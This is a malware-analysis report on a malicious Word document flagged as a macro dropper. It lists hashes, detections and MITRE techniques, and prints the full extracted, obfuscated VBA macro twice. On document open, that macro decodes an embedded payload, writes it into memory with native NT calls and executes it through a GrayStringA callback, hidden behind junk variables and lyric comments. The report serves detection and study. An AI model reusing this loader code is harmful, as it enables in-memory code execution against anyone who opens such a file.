Office (OLE) malware analysis — malicious · d2d786e373e96885

MALICIOUS

Office (OLE)

172.5 KB Created: 2017-02-27 12:58:00 Authoring application: Microsoft Office Word First seen: 2017-03-05

MD5: 64804622a77cb0fc6c1af2e27d6132e6 SHA-1: b4ab887495b256f903f5b5facc7ab5e4e4040414 SHA-256: d2d786e373e968858e8a45118b20b744c621e10c84d5bbfddd0ff12841c5442b

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.ZwMacros-6057750-0, indicating it's a macro-based dropper. The presence of a Document_Open macro and a large VBA macro further supports this. The VBA script likely attempts to download and execute a secondary payload, a common technique for macro-based malware.

Heuristics 4

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim dysmeromorph As String
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14106 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14106 bytes
SHA-256: `27262a621d01de01321b7dbb7893bc15e0bb6b0e6d13a5906e7b0416083e5c3a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub impermissibly() Dim espagne As Byte Dim atonicity As Long changing = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages) zenaidura.hireling.Value = changing + 9 bellwether = "nec" & "romancer" verba = "ad" & "miri" & "ng" Set ny = zenaidura.hireling.SelectedItem irishman = 2 malignant = 202 baccate = 25909 atrabilious = 465601 atrabilious = SYD(atrabilious, baccate, malignant, irishman) excluded = ny.Name boronic = 5844 hardworking = Right(excluded, boronic) audiometry = counterpunch.algid(hardworking) insipid = 4 nolimetangere = 166 stuck = 17963 febrile = 237146 febrile = SYD(febrile, stuck, nolimetangere, insipid) barriers = "co" & "njoin" hearted = "etude" #If Win64 Then Dim crossed As Byte Dim walk As LongPtr Dim cornish As LongPtr Dim indetermination As Byte #Else Dim burnable As Variant Dim cornish As Long Dim mastotermitidae As String Dim walk As Long #End If damselfish = 108 - 108 prospicience = "corydalidae" electoral = 4096 muscicapidae = 8 isohel = 302 boulder = 36051 sliver = 414896 sliver = SYD(sliver, boulder, isohel, muscicapidae) aberdevine = "pappus" cynoscion = "adiantaceae" saipan = 4 alimentary = 293 cnidaria = 12334 illconditioned = 417490 illconditioned = SYD(illconditioned, cnidaria, alimentary, saipan) sapper = audiometry digenesis = "meed" walk = anarhichas(sapper) plaque = "seawan" blossoming = "fixer" #If Win64 Then Dim acceptor As String Dim halogen As LongPtr amulet = "gory" florilegium = "dutifully" stupefying = "corinthians" Dim wishfulness As LongPtr elflike = 108 + 31 + 71 + 1102 #Else alibi = "metacenter" oldbuck = "anguine" Dim halogen As Long scandalized = 93 + 115 + 287 Dim wishfulness As Long elflike = scandalized + 2659 #End If Dim strappado As String Dim galley As Long halogen = 0 cornish = walk + elflike wishfulness = 45 - 44 devitedness = motley(wishfulness, wishfulness, cornish, halogen, wishfulness, halogen, halogen, halogen, halogen) comedietta = 6 antarctic = 360 gravel = 27248 achiever = 251932 achiever = SYD(achiever, gravel, antarctic, comedietta) End Sub Sub headerFooter() Dim myHeader As headerFooter Set myHeader = ActiveDocument.Sections(1).Headers _ (wdHeaderFooterPrimary) End Sub Private Sub Document_Open() Dim dysmeromorph As String Dim cobblestone As Variant napiers = "bilimbi" thermionics = "approaching" impermissibly overmeasure = 4 akimbo = 286 frequent = 54646 stayathome = 291421 stayathome = SYD(stayathome, frequent, akimbo, overmeasure) End Sub Function anarhichas(till) Dim alp As Variant Dim apocalypse As Byte Dim dubitation As String Dim cryoscope As String #If Win64 > 0 Then Dim gag As Integer Dim abbreviate As LongPtr abjectness = 26 - 84 + 93 - 27 Dim folly As LongPtr Dim peculiar As Integer Dim arrows As String Dim biogenesis As LongPtr Dim fagus As Byte #Else Dim ruling As Byte Dim abbreviate As Long abjectness = 11 - 36 + 29 Dim folly As Long Dim biograph As String Dim biogenesis As Long Dim fruiterer As Variant Dim encounter As Byte #End If brunnhilde = VarPtr(abbreviate) dreams = companionability(brunnhilde, VarPtr(till) + 8, abjectness) ambulant = -1 folly = 0 missayingk = 0 biogenesis = 9598 stirringly = 4096 bees = 64 fraternally = ecclesiologist(ByVal ambulant, folly, ByVal missayingk, biogenesis, ByVal stirringly, ByVal bees) capybara = envenomed microcentrum = Math.Round(81) companionability folly, abbreviate, 115 + 4269 cornucopia = 7 curtailed = 160 partitionist = 22163 gc = 526041 gc = SYD(gc, partitionist, curtailed, cornucopia) anarhichas = folly End Function Function companionability(cannelloni, sleepwalker, hypervitaminosis) #If Win64 Then Dim speakership As Variant Dim cyma As Byte Dim sectarist As LongPtr Dim celt As LongPtr Dim lavish As LongPtr Dim adversative As String Dim beggarmyneighbor As LongPtr Dim buttonhole As LongPtr #Else Dim celt As Long Dim matsyendra As Integer Dim sectarist As Long Dim battology As Variant Dim beggarmyneighbor As Long Dim devitalization As Integer Dim lavish As Long Dim jeu As Variant Dim buttonhole As Long Dim behindhand As String Dim rung As String #End If envenomed = capybara spreadeagleism = "adrenarche" celt = cannelloni buttonhole = hypervitaminosis microcentrum = Math.Round(377) beggarmyneighbor = sleepwalker counterrevolution = 78 enclave = 23852 adsorbent = 136224 locally = NPer(37 / 637, counterrevolution, -29190, adsorbent, 1) envenomed = "nonimitation" sectarist = 40 - 41 paleornithology ByVal sectarist, celt, beggarmyneighbor, buttonhole, lavish capybara = "spitz" End Function Attribute VB_Name = "counterpunch" ' Good Will Hunting, got up out of the hood ' I been bumping Pink Floyd, all I wanted was my recording label deal #If Win64 Then ' Awesome, I guess that's awesome ' Awesome, well let's go, awesome Public Declare PtrSafe Function ecclesiologist Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (abut As LongPtr, serine As LongPtr, ByVal casket As LongPtr,infarctByVal As LongPtr, analgesic As LongPtr, ByVal strokes As LongPtr) As LongPtr ' ' Like I feel so awesome Public Declare PtrSafe Function athene Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sophistical As LongPtr) ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function paleornithology Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal petronel As Any, ByVal augmenting As Any, ByVal absinth As Any, ByVal adrenergic As Any, ByVal roach As Any) As LongPtr ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function motley Lib "User32.dll" Alias "GrayStringA" ( ByVal aumbry As Any, ByVal behalf As Any, ByVal dracontium As Any, ByVal transduction As Any, ByVal inconclusiveness As Any, ByVal foliated As Any, ByVal attract As Any, ByVal coffee As Any, ByVal odorless As Any) As Long ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function arithmetically Lib "Shell32.dll" Alias "SHGetSettings" (appendicitis As LongPtr,dolorous As LongPtr) As LongPtr ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function auxesis Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal eidoloclast As LongPtr,animadvert As LongPtr,absentee As LongPtr,molucella As LongPtr,glossarist As LongPtr) As Boolean ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function lionhearted Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (asbestos As LongPtr, bgirl As Any,dubiety As LongPtr, boxwood As Any) As Boolean ' That's why I can walk up into any restaurant and close the whole thing ' Hands in the sky like Public Declare PtrSafe Function desecrating Lib "Shlwapi.dll" Alias "PathFileExists" (nightwork As LongPtr) As LongPtr ' Awesome, well let's go, awesome ' Gator on my shirt, what did it Lacoste him ' That's a side smiley face cause I'mma make the best of it ' Two thumbs up, you gon point em at this guy #Else ' Awesome, I guess that's awesome ' That's why I can walk up into any restaurant and close the whole thing Public Declare Function basel Lib "Shell32.dll" Alias "SHGetSettings" (auld As Long, paleface As Long) As Long ' ' Death proof ride with Rosario Dawson Public Declare Function regretted Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal blahs As Long, pallbearer As Long, nonexploratory As Long, bacteriological As Long, wrongly As Long) As Boolean ' Wanna roll ' Public Declare Function motley Lib "User32.dll" Alias "GrayStringA" (ByVal scorched As Any, ByVal orchestrated As Any, ByVal entendu As Any, ByVal affiance As Any, ByVal curate As Any, ByVal bounty As Any, ByVal sourbread As Any, ByVal carcharhinidae As Any, ByVal cantharides As Any) As Long ' ' I assume you should make room for the elephant Public Declare Function ecclesiologist Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (gluttonous As Long, appositively As Long, ByVal pomade As Long, penchantByVal As Long, sandpapery As Long, ByVal registrant As Long) As Long ' Semi colon dash parenthesis, text messaging ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Function haloragidaceae Lib "Shell32.dll" Alias "SHGetDesktopFolder" (autoeroticism As Long) ' Awesome, I guess that's awesome ' Good Will Hunting, got up out of the hood Public Declare Function paleornithology Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal tangency As Any, ByVal indoor As Any, ByVal davus As Any, ByVal mao As Any, ByVal bight As Any) As Long ' Awesome, well let's go, awesome ' See even G couldn't F with it Public Declare Function animate Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (incinerate As Long, fucus As Any, adjective As Long, atmospheric As Any) As Boolean ' Awesome, well let's go, awesome ' See even G couldn't F with it Public Declare Function insensitively Lib "Shlwapi.dll" Alias "PathFileExists" (climatic As Long) As Long ' Awesome, well let's go, awesome ' See even G couldn't F with it ' Awesome, well let's go, awesome ' See even G couldn't F with it #End If ' Awesome, well let's go, awesome ' See even G couldn't F with it Function miscreance(shrinkable) miscreance = AscW(shrinkable) End Function Function naturalized(regal, porgy, descendant) Select Case descendant Case 26 naturalized = regal \ porgy Case 36 naturalized = regal And porgy Case 44 naturalized = regal * porgy End Select End Function Sub tableSel() Dim tempTable Documents("Log.doc").Tables(1).Select Set tempTable = Selection.Tables(1).Range tempRange.Tables(2).Select End Sub Function miter() Dim holonymy(255) As Byte acrosstheboard = 10 - 84 + 1 + 138 Do holonymy(acrosstheboard) = acrosstheboard - 65 acrosstheboard = acrosstheboard + 1 Loop Until acrosstheboard = 91 acrosstheboard = 48 Do holonymy(acrosstheboard) = acrosstheboard + 4 acrosstheboard = acrosstheboard + 1 Loop Until acrosstheboard = 58 acrosstheboard = 97 Do holonymy(acrosstheboard) = acrosstheboard - 71 acrosstheboard = acrosstheboard + 1 Loop Until acrosstheboard = 123 holonymy(47) = 63 acrosstheboard = 43 holonymy(acrosstheboard) = 62 miter = holonymy End Function Function algid(negligable) As String Dim poetic As Integer Dim amor(63) As Long Dim circumambulation() As Byte Dim sauropod As Long Dim manliness As Long Dim arginine As Byte Dim piacere(63) As Long Dim cambarus As Integer Dim sclerotomy As Long envenomed = "appris" Dim ordeal As Long Dim trifle(63) As Long Dim slew(6965) As Byte Dim flatfish As Long microcentrum = Rnd(143) chlorotic = chlorotic \ 315 Dim prosaist As String Dim materiel As Variant playwright = 65536 malign = 75 - 54 + 4075 honeymouthed = 75 - 101 - 39 + 321 illapse = 262144 Dim nile As Long Dim famotidine As String cryogen = 16711680 hygre = 64 - 102 + 102 maladroit = 16515072 drift = 25 - 81 - 122 + 65458 unwiped = 255 embalmment = 42 - 11 + 6 + 3995 Dim makeweight As Byte puffingl = 104 + 257944 sobbing = 63 Dim mandrel As Byte ute = 19 - 19 aeschynanthus = 5843 Dim bendable() As Byte Dim thimblerigger As Variant bendable = VBA.Strings.StrConv(negligable, vbFromUnicode) Dim compassionate As Long watchett = 2 cashew = 191 hitler = 26757 silkworm = 571787 silkworm = SYD(silkworm, hitler, cashew, watchett) gromwell = 5843 cinderwench = 2 + Sqr(RGB(0, 1, 0)) For octopod = 0 To gromwell If octopod Mod 2 = 0 Then bendable(octopod) = bendable(octopod) + cinderwench Else bendable(octopod) = bendable(octopod) + cinderwench - 1 End If Next octopod arthrospore = 94 every = 35511 acutely = 167749 gritty = NPer(48 / 534, arthrospore, -5628, acutely, 1) poetic = 0 chlorophyll = 44 - 81 + 37 acidulate = 43 ascospore = miter For sclerotomy = 0 To 63 amor(sclerotomy) = naturalized(sclerotomy, hygre, 44) piacere(sclerotomy) = naturalized(sclerotomy, malign, 44) trifle(sclerotomy) = naturalized(sclerotomy, illapse, 44) Next sclerotomy burgoyne = 75 narrowness = 27068 zeta = 223199 kura = NPer(32 / 536, burgoyne, -4664, zeta, 1) circumambulation = bendable owlish = 121 - 90 - 83 + 56 airport = 48 harry = 28786 adnexa = 121286 footlocker = NPer(40 / 787, airport, -39772, adnexa, 1) illdisposed = 86 + 120 - 4 - 199 capybara = envenomed envenomed = envenomed usefully = illdisposed + 1 adventurous = 17 - 15 For flatfish = 0 To gromwell barred = circumambulation(flatfish) irresolution = circumambulation(flatfish + 2) ordeal = trifle(ascospore(barred)) _ + piacere(ascospore(circumambulation(flatfish + 1))) + amor(ascospore(irresolution)) + ascospore(circumambulation(flatfish + illdisposed)) sclerotomy = naturalized(ordeal, cryogen, 36) slew(sauropod) = naturalized(sclerotomy, playwright, 26) sclerotomy = naturalized(ordeal, drift, 36) slew(sauropod + 1) = naturalized(sclerotomy, honeymouthed, 26) slew(sauropod + adventurous) = naturalized(ordeal, unwiped, 36) sauropod = sauropod + adventurous + 1 flatfish = flatfish + 3 Next algid = slew End Function Attribute VB_Name = "zenaidura" Attribute VB_Base = "0{8988B926-E392-4E7F-A538-BB4D114C1CF8}{33336EA4-8230-40D2-A667-4FE1D521C8E6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 27262a621d01de01321b7dbb7893bc15e0bb6b0e6d13a5906e7b0416083e5c3a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub impermissibly()
Dim espagne As Byte
Dim atonicity As Long
changing = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages)
zenaidura.hireling.Value = changing + 9
bellwether = "nec" & "romancer"
verba = "ad" & "miri" & "ng"
Set ny = zenaidura.hireling.SelectedItem
irishman = 2
malignant = 202
baccate = 25909
atrabilious = 465601
atrabilious = SYD(atrabilious, baccate, malignant, irishman)

excluded = ny.Name
boronic = 5844
hardworking = Right(excluded, boronic)
audiometry = counterpunch.algid(hardworking)
insipid = 4
nolimetangere = 166
stuck = 17963
febrile = 237146
febrile = SYD(febrile, stuck, nolimetangere, insipid)

barriers = "co" & "njoin"
hearted = "etude"
#If Win64 Then
Dim crossed As Byte
Dim walk As LongPtr
Dim cornish As LongPtr
Dim indetermination As Byte
#Else
Dim burnable As Variant
Dim cornish As Long
Dim mastotermitidae As String
Dim walk As Long
#End If
damselfish = 108 - 108
prospicience = "corydalidae"
electoral = 4096
muscicapidae = 8
isohel = 302
boulder = 36051
sliver = 414896
sliver = SYD(sliver, boulder, isohel, muscicapidae)

aberdevine = "pappus"
cynoscion = "adiantaceae"
saipan = 4
alimentary = 293
cnidaria = 12334
illconditioned = 417490
illconditioned = SYD(illconditioned, cnidaria, alimentary, saipan)

sapper = audiometry
digenesis = "meed"
walk = anarhichas(sapper)
plaque = "seawan"
blossoming = "fixer"
#If Win64 Then
Dim acceptor As String
Dim halogen As LongPtr
amulet = "gory"
florilegium = "dutifully"
stupefying = "corinthians"
Dim wishfulness As LongPtr
elflike = 108 + 31 + 71 + 1102
#Else
alibi = "metacenter"
oldbuck = "anguine"
Dim halogen As Long
scandalized = 93 + 115 + 287
Dim wishfulness As Long
elflike = scandalized + 2659

#End If
Dim strappado As String
Dim galley As Long
halogen = 0
cornish = walk + elflike
wishfulness = 45 - 44
devitedness = motley(wishfulness, wishfulness, cornish, halogen, wishfulness, halogen, halogen, halogen, halogen)
comedietta = 6
antarctic = 360
gravel = 27248
achiever = 251932
achiever = SYD(achiever, gravel, antarctic, comedietta)

End Sub

Sub headerFooter()
    Dim myHeader As headerFooter
    Set myHeader = ActiveDocument.Sections(1).Headers _
        (wdHeaderFooterPrimary)
End Sub


Private Sub Document_Open()
Dim dysmeromorph As String
Dim cobblestone As Variant
napiers = "bilimbi"
thermionics = "approaching"
impermissibly
overmeasure = 4
akimbo = 286
frequent = 54646
stayathome = 291421
stayathome = SYD(stayathome, frequent, akimbo, overmeasure)
End Sub
Function anarhichas(till)
Dim alp As Variant
Dim apocalypse As Byte
Dim dubitation As String
Dim cryoscope As String
#If Win64 > 0 Then
Dim gag As Integer
Dim abbreviate As LongPtr
abjectness = 26 - 84 + 93 - 27
Dim folly As LongPtr
Dim peculiar As Integer
Dim arrows As String
Dim biogenesis As LongPtr
Dim fagus As Byte
#Else
Dim ruling As Byte
Dim abbreviate As Long
abjectness = 11 - 36 + 29
Dim folly As Long
Dim biograph As String
Dim biogenesis As Long
Dim fruiterer As Variant
Dim encounter As Byte
#End If
brunnhilde = VarPtr(abbreviate)
dreams = companionability(brunnhilde, VarPtr(till) + 8, abjectness)
ambulant = -1
folly = 0
missayingk = 0
biogenesis = 9598
stirringly = 4096
bees = 64
fraternally = ecclesiologist(ByVal ambulant, folly, ByVal missayingk, biogenesis, ByVal stirringly, ByVal bees)
capybara = envenomed

microcentrum = Math.Round(81)

companionability folly, abbreviate, 115 + 4269
cornucopia = 7
curtailed = 160
partitionist = 22163
gc = 526041
gc = SYD(gc, partitionist, curtailed, cornucopia)

anarhichas = folly
End Function
Function companionability(cannelloni, sleepwalker, hypervitaminosis)
#If Win64 Then
Dim speakership As Variant
Dim cyma As Byte
Dim sectarist As LongPtr
Dim celt As LongPtr
Dim lavish As LongPtr
Dim adversative As String
Dim beggarmyneighbor As LongPtr
Dim buttonhole As LongPtr
#Else
Dim celt As Long
Dim matsyendra As Integer
Dim sectarist As Long
Dim battology As Variant
Dim beggarmyneighbor As Long
Dim devitalization As Integer
Dim lavish As Long
Dim jeu As Variant
Dim buttonhole As Long
Dim behindhand As String
Dim rung As String
#End If
envenomed = capybara
spreadeagleism = "adrenarche"
celt = cannelloni
buttonhole = hypervitaminosis
microcentrum = Math.Round(377)
beggarmyneighbor = sleepwalker
counterrevolution = 78
enclave = 23852
adsorbent = 136224
locally = NPer(37 / 637, counterrevolution, -29190, adsorbent, 1)

envenomed = "nonimitation"
sectarist = 40 - 41
paleornithology ByVal sectarist, celt, beggarmyneighbor, buttonhole, lavish
capybara = "spitz"
End Function


Attribute VB_Name = "counterpunch"
'  Good Will Hunting, got up out of the hood
'  I been bumping Pink Floyd, all I wanted was my recording label deal
#If Win64 Then
'  Awesome, I guess that's awesome
'  Awesome, well let's go, awesome
Public Declare PtrSafe Function ecclesiologist Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (abut As LongPtr, serine As LongPtr, ByVal casket As LongPtr,infarctByVal As LongPtr, analgesic As LongPtr, ByVal strokes As LongPtr) As LongPtr
'
'  Like I feel so awesome
Public Declare PtrSafe Function athene Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sophistical As LongPtr)
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function paleornithology Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal petronel As Any, ByVal augmenting As Any, ByVal absinth As Any, ByVal adrenergic As Any, ByVal roach As Any) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public  Declare PtrSafe Function motley Lib "User32.dll" Alias "GrayStringA" ( ByVal aumbry As Any, ByVal behalf As Any, ByVal dracontium As Any, ByVal transduction As Any, ByVal inconclusiveness As Any, ByVal foliated As Any, ByVal attract As Any, ByVal coffee As Any, ByVal odorless As Any) As Long
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function arithmetically Lib "Shell32.dll" Alias "SHGetSettings" (appendicitis As LongPtr,dolorous As LongPtr) As LongPtr
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function auxesis Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal eidoloclast As LongPtr,animadvert As LongPtr,absentee As LongPtr,molucella As LongPtr,glossarist As LongPtr) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function lionhearted Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (asbestos As LongPtr, bgirl As Any,dubiety As LongPtr, boxwood As Any) As Boolean
'  That's why I can walk up into any restaurant and close the whole thing
'  Hands in the sky like
Public Declare PtrSafe Function desecrating Lib "Shlwapi.dll" Alias "PathFileExists" (nightwork As LongPtr) As LongPtr
'  Awesome, well let's go, awesome
'  Gator on my shirt, what did it Lacoste him

'  That's a side smiley face cause I'mma make the best of it
'  Two thumbs up, you gon point em at this guy
#Else
'  Awesome, I guess that's awesome
'  That's why I can walk up into any restaurant and close the whole thing
Public Declare Function basel Lib "Shell32.dll" Alias "SHGetSettings" (auld As Long, paleface As Long) As Long
'
'  Death proof ride with Rosario Dawson
Public Declare Function regretted Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal blahs As Long, pallbearer As Long, nonexploratory As Long, bacteriological As Long, wrongly As Long) As Boolean
'  Wanna roll
'
Public Declare Function motley Lib "User32.dll" Alias "GrayStringA" (ByVal scorched As Any, ByVal orchestrated As Any, ByVal entendu As Any, ByVal affiance As Any, ByVal curate As Any, ByVal bounty As Any, ByVal sourbread As Any, ByVal carcharhinidae As Any, ByVal cantharides As Any) As Long
'
'  I assume you should make room for the elephant
Public Declare Function ecclesiologist Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (gluttonous As Long, appositively As Long, ByVal pomade As Long, penchantByVal As Long, sandpapery As Long, ByVal registrant As Long) As Long
'  Semi colon dash parenthesis, text messaging
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function haloragidaceae Lib "Shell32.dll" Alias "SHGetDesktopFolder" (autoeroticism As Long)
'  Awesome, I guess that's awesome
'  Good Will Hunting, got up out of the hood
Public Declare Function paleornithology Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal tangency As Any, ByVal indoor As Any, ByVal davus As Any, ByVal mao As Any, ByVal bight As Any) As Long
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
Public Declare Function animate Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (incinerate As Long, fucus As Any, adjective As Long, atmospheric As Any) As Boolean
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
Public Declare Function insensitively Lib "Shlwapi.dll" Alias "PathFileExists" (climatic As Long) As Long
'  Awesome, well let's go, awesome
'  See even G couldn't F with it

'  Awesome, well let's go, awesome
'  See even G couldn't F with it
#End If
'  Awesome, well let's go, awesome
'  See even G couldn't F with it
Function miscreance(shrinkable)
miscreance = AscW(shrinkable)
End Function
Function naturalized(regal, porgy, descendant)
Select Case descendant
Case 26
naturalized = regal \ porgy
Case 36
naturalized = regal And porgy
Case 44
naturalized = regal * porgy
End Select
End Function
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub


Function miter()
Dim holonymy(255) As Byte
acrosstheboard = 10 - 84 + 1 + 138
Do
holonymy(acrosstheboard) = acrosstheboard - 65
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 91
acrosstheboard = 48
Do
holonymy(acrosstheboard) = acrosstheboard + 4
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 58
acrosstheboard = 97
Do
holonymy(acrosstheboard) = acrosstheboard - 71
acrosstheboard = acrosstheboard + 1
Loop Until acrosstheboard = 123
holonymy(47) = 63
acrosstheboard = 43
holonymy(acrosstheboard) = 62
miter = holonymy
End Function
Function algid(negligable) As String
Dim poetic As Integer
Dim amor(63) As Long
Dim circumambulation() As Byte
Dim sauropod As Long
Dim manliness As Long

Dim arginine As Byte

Dim piacere(63) As Long
Dim cambarus As Integer

Dim sclerotomy As Long
envenomed = "appris"

Dim ordeal As Long
Dim trifle(63) As Long
Dim slew(6965) As Byte
Dim flatfish As Long
microcentrum = Rnd(143)

chlorotic = chlorotic \ 315

Dim prosaist As String
Dim materiel As Variant

playwright = 65536
malign = 75 - 54 + 4075
honeymouthed = 75 - 101 - 39 + 321
illapse = 262144
Dim nile As Long

Dim famotidine As String

cryogen = 16711680
hygre = 64 - 102 + 102
maladroit = 16515072
drift = 25 - 81 - 122 + 65458
unwiped = 255
embalmment = 42 - 11 + 6 + 3995
Dim makeweight As Byte

puffingl = 104 + 257944
sobbing = 63
Dim mandrel As Byte
ute = 19 - 19
aeschynanthus = 5843
Dim bendable() As Byte
Dim thimblerigger As Variant
bendable = VBA.Strings.StrConv(negligable, vbFromUnicode)
Dim compassionate As Long
watchett = 2
cashew = 191
hitler = 26757
silkworm = 571787
silkworm = SYD(silkworm, hitler, cashew, watchett)

gromwell = 5843
cinderwench = 2 + Sqr(RGB(0, 1, 0))
For octopod = 0 To gromwell
If octopod Mod 2 = 0 Then
bendable(octopod) = bendable(octopod) + cinderwench
Else
bendable(octopod) = bendable(octopod) + cinderwench - 1
End If
Next octopod
arthrospore = 94
every = 35511
acutely = 167749
gritty = NPer(48 / 534, arthrospore, -5628, acutely, 1)

poetic = 0
chlorophyll = 44 - 81 + 37
acidulate = 43
ascospore = miter
For sclerotomy = 0 To 63
amor(sclerotomy) = naturalized(sclerotomy, hygre, 44)
piacere(sclerotomy) = naturalized(sclerotomy, malign, 44)
trifle(sclerotomy) = naturalized(sclerotomy, illapse, 44)
Next sclerotomy
burgoyne = 75
narrowness = 27068
zeta = 223199
kura = NPer(32 / 536, burgoyne, -4664, zeta, 1)

circumambulation = bendable
owlish = 121 - 90 - 83 + 56
airport = 48
harry = 28786
adnexa = 121286
footlocker = NPer(40 / 787, airport, -39772, adnexa, 1)

illdisposed = 86 + 120 - 4 - 199
capybara = envenomed

envenomed = envenomed

usefully = illdisposed + 1
adventurous = 17 - 15
For flatfish = 0 To gromwell
barred = circumambulation(flatfish)
irresolution = circumambulation(flatfish + 2)
ordeal = trifle(ascospore(barred)) _
 + piacere(ascospore(circumambulation(flatfish + 1))) + amor(ascospore(irresolution)) + ascospore(circumambulation(flatfish + illdisposed))
sclerotomy = naturalized(ordeal, cryogen, 36)
slew(sauropod) = naturalized(sclerotomy, playwright, 26)
sclerotomy = naturalized(ordeal, drift, 36)
slew(sauropod + 1) = naturalized(sclerotomy, honeymouthed, 26)
slew(sauropod + adventurous) = naturalized(ordeal, unwiped, 36)
sauropod = sauropod + adventurous + 1
flatfish = flatfish + 3
Next
algid = slew
End Function



Attribute VB_Name = "zenaidura"
Attribute VB_Base = "0{8988B926-E392-4E7F-A538-BB4D114C1CF8}{33336EA4-8230-40D2-A667-4FE1D521C8E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.